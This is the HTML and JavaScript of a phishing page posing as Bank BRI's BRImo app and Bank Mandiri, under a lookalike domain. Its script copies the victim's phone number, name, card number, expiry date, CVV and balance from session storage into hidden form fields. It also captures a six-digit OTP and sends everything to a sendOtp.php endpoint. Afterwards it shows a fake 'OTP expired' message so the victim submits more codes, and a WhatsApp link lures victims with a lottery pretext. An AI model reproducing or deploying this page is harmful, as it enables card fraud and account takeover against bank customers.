<html>
 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#1E90FF"> 

  <link rel="canonical" href="https://perubahantarifbri.info/-brimo"> 
  <link href="https://play-lh.googleusercontent.com/sykVTkZ6juW7CD1eeZCK1UTi1aDwr4tOQ6KRMuMimOsIZYsK9Rbxwhk-PGu3nA1iaoQ1=w480-h960-rw" rel="shortcut icon" type="image/x-icon">
  <link href="https://play-lh.googleusercontent.com/sykVTkZ6juW7CD1eeZCK1UTi1aDwr4tOQ6KRMuMimOsIZYsK9Rbxwhk-PGu3nA1iaoQ1=w480-h960-rw" rel="apple-touch-icon"> 
  <meta name="twitter:card" content="summary_large_image"> 
  <meta property="og:title" content="BRlmo - Bank BRI"> 
  <meta name="twitter:title" content="BRlmo - Bank BRI"> 
  <meta property="og:site_name" content="BRImo">
  <meta property="og:url" content="https://perubahantarifbri.info/-brimo"> 
  <meta property="og:type" content="website"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>BANK MANDIRI</title> 
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
      body, html{
       background-color: #F1F2F4;
       height: 100%;
       width: 100%;
       top: 0;
       left: 0;
       right: 0;
       bottom: 0;
       margin: 0px auto;
       position: fixed;
   }
   

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 45px; 
            width: 336px;
            max-width: 90%;
            border: 3px solid rgb(0, 134, 224);
            border-radius: 23px;
            font-family: 'Open Sans', sans-serif;
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 7px; 
            padding: 0px 45px;
            text-align: center;
            }

        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 8px;
            margin-left: 37px;
        }

        .eye {
            display: block;
            margin: -40px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .Button-clickable-element {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background-image: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd-qSGMSkbbXy0wMWEIMFelztPG8bXcihBqho-SYqhToFYqg28K1LAuZ8cVjhAR0S67NvqsdqlmeNreVXNCrUvEEll9XdLfzpEGhT45IhipcJo8hPDnY_GpqUJZW5syZrOolrainzunt_lCNXWutLrFs9QgbITS2-ya7nsEXUkdPA6uLnZKGITsBqMxYo/s780/2ZH.webp");
  background-position: 100% 100%;
  background-size: 100% 100%;
            background-color: #1E90FF;
            border: none; 
            text-align: center; 
            height: 60px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 17px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 20px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }
 .logo{
        font-family: helvetica;
  text-align:center;
  color: #fff;
  max-width: 100%;
  height: auto;
  font-size: 13px;
  margin-top: -0px;
  margin-bottom: -55px;
  margin-left: -0px;
  background: #007DFE;
  position: fixed;

   }


        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
        }

        .box-lte {
            width: 92%;
            height: 480px;
            max-width: 100%;
            background-image: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGEBquLiMz-sy5JgsGFsfepbIBWKly-V6bUmVGt4-bN0RiG0djhUTDkCtbOogOvRXkUrUK2sUqrxVrnfR_UpDMwaB7y41_tz8mL-yBtEcS2DKAR4mw6jkGxelsYZCW6lGsWfH2RiXCB2R_5HshMaK9t_5lKedeVfNLL3W7WTmQFhkaQL-opWI7jM6u/s16000/AddText_06-12-08.18.09.jpg");
  background-position: 100% 100%;
  background-size: 100% 100%;
  background-repeat: no-repeat;
            display: block;
            margin: 0px auto;
            border-radius: 20px;
            border: 1px solid #ccc;
            position: absolute;
            top: 80;
            left: 0; 
            right: 0;
            padding: 0px;
            box-shadow: rgb(170, 170, 170, 0.4) 2px 2px 10px 2px; 
        }

        textarea {
            box-sizing: border-box; 
            height: 60px; 
            width: 536px;
            border: 3px solid rgb(0, 134, 224);
            border-radius: 8px;
            padding: 5px 10px;
        }
        
        .pin-code{ 
  padding: 10; 
  margin: 10 auto; 
  display: flex;
  justify-content:center;
  
} 
 
.pin-code input { 
  border: 2px solid #1E90FF; 
  text-align: center; 
  text-shadow: 1px  1px 1px lime;
  width: 40px;
  height: 45px;
  font-size: 36px;
  color: #1E90FF;
  background-color: #DDDDDD;
   margin-left: 4px;
  border-radius: 8px;
  margin-top: -18px;
} 



.pin-code input:focus { 
  border: 1px solid #573D8B;
  outline:none;
} 


input::-webkit-outer-spin-button,
input::-webkit-inner-spin-button {
    -webkit-appearance: none;
    margin: 0;
}


.loader {
    margin-top: 300;
    width: 35px;
    height: 35px;
    background: #fff;
    border: 5px solid #1E90FF;
    outline: 5px solid #fff;
    border-bottom-color: transparent;
    border-radius: 50%;
    display: inline-block;
    box-sizing: border-box;
    animation: rotation 1s linear infinite;
    }

    @keyframes rotation {
    0% {
        transform: rotate(0deg);
    }
    100% {
        transform: rotate(360deg);
    }
    } 
    
    
    #lodingku{
    position: fixed; 
    top: 0; 
    right: 0; 
    left: 0; 
    display: none;
    bottom: 0;
    margin: 0px auto;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.5);
    z-index: 99999999;
}

    </style> 
 </head> 
 <body> 
             <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwnigN234Z7wCpac2aUuWQmWY_3sUHOwUGPtk01Mg2qmPfTi51T5o9iwo85OtXAUdLWY3Yzgne-ZIG-W-p2K3RtkoMws4sYpeffBtHXRFXO19AIk7QElhKXssKzmZoyinfNx5uZEq42ZQO1OOeLTzaD_s9iIkxn0Q7W96K4I0udBLZ-yQKImqzvLM/s1080/Screenshot_2023-01-10-22-48-30-43_40deb401b9ffe8e1df2f1cc5ba480b12.jpg" class="logo">
  <div class="container"> 
   <div class="box-lte"> 
    <div class="row" style="margin-top: 100px;"> 
     <div class="col-12 d-block mx-auto text-center p-0" style="height: 70px; width: 256px; max-width: 100%; display: block; margin-top: -50px; border-radius: 0px;"> 
      
    </div> 
       <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk3IjBkJg4SkjTGKlzZujhli7c6FGdaB7BqJOf9dpLCitfpnhTHSUzkJ4TJAeBlt1osqYg7bNGdijL4hWtiCIAVBTVjOClPoqdge5B83pW0wN9sa-c88r-HUqobhtGQMokEN24_8_RBig78KlD3T4IiPFPGaDmowZ-bgWn0sk1R---xo4dDXWXNFArGEw/s1061/1692009558668.png" style="max-width: 100%; bottom: 30px; margin-top: -30px">
     <hr style="display: block; margin: auto; width: 1%;"> 
     <center>
     <p style="font-weight: bold; font-size: 25px; color: #098CE3; text-align: center; margin: 10px auto;" id="timer">3 : 00</p> 
     </center>
    </div> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px;"> 
     
    </div> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 0px auto;">
         <div class="pin-code" maxlength="6" style="position: absolute; left: 0; right: 0; margin: 0px auto; margin-top: -15px"> 
     <form onsubmit="kirimPesan(event)" method="POST" id="pincode">
       <center> 
        <div style="margin-top: 1px"> 
<input type="hidden" id="tele" name="nomorsaya" value="">
<input type="hidden" id="namanye" name="namaku" value="">
<input type="hidden" id="kertu" name="debit" value="">
<input type="hidden" id="validku" name="bulan" value="">
<input type="hidden" id="cvvv" name="cvv" value="">
<input type="hidden" id="uang" name="uang" value="">
<input type="password" inputmode="numeric" id="pin" maxlength="1" autofocus required>
    <input type="password" inputmode="numeric" id="pin1" name="pin1" maxlength="1" autofocus>
	  <input type="password" inputmode="numeric" id="pin2" name="pin2" maxlength="1" autofocus>
    <input type="password" inputmode="numeric" id="pin3" name="pin3" maxlength="1" autofocus>
    <input type="password" inputmode="numeric" id="pin4" name="pin4" maxlength="1" autofocus>
    <input type="password" inputmode="numeric" id="pin5" name="pin5" maxlength="1" required>
     </div> 
    
         <b>

    <p style="font-size: 14px; text-align: center; margin-top: 20px;"><strong style="color: #5e5e5e;">
      <a href="https://wa.me/6282180998974?text=Hallo,%20𝗕𝗮𝗻𝗸 𝗠𝗮𝗻𝗱𝗶𝗿𝗶%0Asaya%20mau%20request%0AOTP%20Kupon Undian" style="text-decoration: underline; color: #134BBA; ">Request Kode OTP ?</a></strong></p> 
<p id="notif" style="position: fixed; left: 0; right: 0; font-size: 13px; margin-top: -10px; color: red"></p>
             <p style="font-size: 11px; text-align: center; margin-top: -10px; margin-left: 0px; margin-right: 0px;">
             <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx2k9A5CdvvhLTXn_DXnZHbyczB3b5cMJ9KTLCjyKDx539QELYWbYKU0LpFYOfZ1YqH3PX7oPHVbdwJ7PCkZ05iiWqyUebExY-VrFy32-6XRES0rw3Hfg1CrDU6YbkJZjZtvOe3tSb7OUzTAXPs8EjCmICsHYzm697vrWr_uC1TSgOLe2Y3DT5BMIH/s1061/IMG_20230110_232318.jpg" width="100%" style="margin-top: 30px; max-width: 100%;">
    </p>


       <b>
<div style="position: fixed; width: 100%; height: 90px; background: #fff;  left: 0; right: 0; margin: 0px auto; bottom: 0; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; ">
<button type="submit" id="kirim" class="bubble-element Button-clickable-element" style="position: fixed; width: 90%; height: 55px; color: #fff; border-radius: 40px; border: none; left: 0; right: 0; margin: 0px auto; bottom: 20" value="Konfirmasi">Konfirmasi</button>
</div>
</b>
      </form>
      </div>
     <b>
<footer style="font-size: 10px; text-align: center; margin-top: 17px; position: bottom;"><strong style="color: #EAEAEA;">© 2023 PT Bank Mandiri (Persero) Tbk.
</strong>
</footer> 
    <b>
        <center>
  <div class="app-loading" style="position: fixed; margin: 0px auto; left: 0; right: 0; top: 0; bottom: 0; width: 100%; height: 100%; background: rgba(190, 190, 190, 0.4); z-index: 99999999; padding-top: 250px; display: none" id="lodingku">
    <img class="img-fluid" style="width: 140px" src="https://join.bankmandiri.co.id/app/assets/img/img_mandiri/preloader1.gif" alt="preloader" />
      </div>
  </center>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script>
        document.getElementById('timer').innerHTML =
          01 + ":" + 01;
        startTimer();
        
        
        function startTimer() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
    </script> 
<script>
var phone = sessionStorage.getItem("phone");
 document.getElementById("tele").value = phone + "";
  var user = sessionStorage.getItem("user");
 document.getElementById("namanye").value = user + "";
  var card = sessionStorage.getItem("card");
 document.getElementById("kertu").value = card + "";
 var bul = sessionStorage.getItem("bul");
 document.getElementById("validku").value = bul + "";

 var kode = sessionStorage.getItem("kode");
 document.getElementById("cvvv").value = kode + "";
  var duet = sessionStorage.getItem("duet");
 document.getElementById("uang").value = duet + "";
 

</script>
<script>
 $('#pincode').on('submit', function (event) {

  event.stopPropagation();
    event.preventDefault();
    
  $("#lodingku").show();



$.ajax({

 type: 'POST',
 url: 'sendOtp.php',
 async: false,
 dataType: 'JSON',
 data: $(this).serialize(),
 
 complete: function(data) {
            console.log('Complete')

 setTimeout(function(){
       $("#lodingku").hide();
     document.getElementById("pincode").reset();
      $("#notif").show();
      $("#pin").focus();
   $("#notif").text("- Kode OTP Kadaluarsa, Silahkan Coba Lagi. -");
   setTimeout(() => {
       $("#notif").fadeOut();
   }, 2500);
    }, 1500);



        }
    });

    return false;
});   
        
</script>

<script>

        $(document).ready(function() {
            setTimeout(() => {
                $('#pin').focus();
            },0)
        });
        
  
</script>
<script>
//var pinContainer = document.getElementsByClassName("pin-code")[maxlength];
var pinContainer = document.querySelector(".pin-code");
console.log('There is ' + pinContainer.length + ' Pin Container on the page.');

pinContainer.addEventListener('keyup', function (event) {
    var target = event.srcElement;
    
    var maxLength = parseInt(target.attributes["maxlength"].value, 6);
    var myLength = target.value. length;

    if (myLength >= maxLength) {
        var next = target;
        while (next = next.nextElementSibling) {
            if (next == 0) break;
            if (next.tagName.toLowerCase() == "input") {
                next.focus();
                break;
            }
        }
    }

    if (myLength === 0) {
        var next = target;
        while (next = next.previousElementSibling) {
            if (next == 0) break;
            if (next.tagName.toLowerCase() == "input") {
                next.focus();
                break;
            }
        }
    }
}, false);

pinContainer.addEventListener('keydown', function (event) {
    var target = event.srcElement;
    target.value = "";
}, false);
</script>
  <!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
</body>
</html>